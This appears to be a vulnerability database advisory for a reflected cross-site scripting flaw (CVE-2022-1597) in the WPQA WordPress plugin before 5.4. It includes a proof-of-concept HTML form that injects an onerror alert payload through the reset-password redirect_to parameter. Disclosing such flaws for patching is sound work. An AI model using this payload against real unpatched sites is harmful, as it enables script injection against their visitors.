WordPress Plugin Vulnerabilities

WPQA < 5.4 - Reflected Cross-Site Scripting

Description

The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <!-- The email address has to be the correct email address of a registered user for the payload to trigger. -->
      <input type="hidden" name="user_mail" value="valid@user.email" />
      <input type="hidden" name="form_type" value="wpqa_forget" />
      <input type="hidden" name="action" value="wpqa_ajax_password_process" />
      <input type="hidden" name="redirect_to" value="'<img src=x onerror=alert(1)>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Video: https://www.youtube.com/watch?v=E2GRtf6prq8

Affects Plugins

Plugin icon
wpqa
Fixed in 5.4

References

CVE
CVE-2022-1597

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
Veshraj Ghimire
Submitter
Veshraj Ghimire
Submitter website
https://veshrajghimire.com.np
Submitter twitter
GhimireVeshraj
Verified
Yes
WPVDB ID
faff9484-9fc7-4300-bdad-9cd8a30a9a4e

Timeline

Publicly Published
2022-05-10 (about 2 years ago)
Added
2022-05-16 (about 1 years ago)
Last Updated
2022-05-17 (about 1 years ago)

Other

Published
Title
Published
2023-03-15
Title
PB SEO Friendly Images <= 4.0.5 - Admin+ Stored XSS
Published
2021-08-25
Title
WP Map Block < 1.2.3 - Contributor+ Stored Cross-Site Scripting
Published
2023-02-02
Title
List Pages Shortcode < 1.7.6 - Contributor+ Stored XSS via Shortcode
Published
2015-11-23
Title
My Link Order <= 4.3 - Authenticated Cross-Site Scripting (XSS)
Published
2024-03-12
Title
HT Mega < 2.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via titleTag